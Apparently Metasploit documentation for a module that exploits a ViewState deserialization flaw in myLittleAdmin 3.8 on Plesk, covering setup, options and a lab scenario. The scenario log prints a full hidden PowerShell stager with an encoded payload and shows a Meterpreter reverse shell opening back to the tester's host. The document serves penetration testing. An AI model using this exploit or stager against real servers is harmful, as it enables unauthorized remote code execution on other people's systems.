## Vulnerable Application

### Description

This module exploits a ViewState .NET deserialization vulnerability in
web-based MS SQL Server management tool myLittleAdmin, for version 3.8
and likely older versions, due to hardcoded `<machineKey>` parameters in
the `web.config` file for ASP.NET.

Popular web hosting control panel Plesk offers myLittleAdmin as an
optional component that is selected automatically during "full"
installation. This exploit caters to the Plesk target, though it
should work fine against a standalone myLittleAdmin setup.

Successful exploitation results in code execution as the user running
myLittleAdmin, which is `IUSRPLESK_sqladmin` for Plesk and described as
the "SQL Admin MSSQL anonymous account."

Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.

### Setup

Follow Plesk's [official
instructions](https://docs.plesk.com/en-US/obsidian/deployment-guide/76450/),
making sure to select the "Obsidian" release and the `Full` installation
option. This will get you myLittleAdmin. Alternatively, you may select
the myLittleAdmin component manually.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This executes a Windows command.

### 1

This uses a Windows dropper to execute code.

### 2

This uses a PowerShell stager to execute code.

## Options

### RPORT

You may need to change `RPORT` to where myLittleAdmin is running. It is
set to port **8401** by default for Plesk installations.

## Scenarios

### myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016

```
msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options

Module options (exploit/windows/http/plesk_mylittleadmin_viewstate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8401             yes       The myLittleAdmin port (default for Plesk!) (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169
rhosts => 172.16.249.169
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] myLittleAdmin is running at https://172.16.249.169:8401/
[+] The target is vulnerable. We can sign our own ViewState.
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Powershell command length: 2498
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[*] Sending stage (201283 bytes) to 172.16.249.169
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.169:57257) at 2020-05-21 17:27:42 -0500

meterpreter > getuid
Server username: WIN-NANLB47E6I4\IUSRPLESK_sqladmin
meterpreter > sysinfo
Computer        : WIN-NANLB47E6I4
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter >
```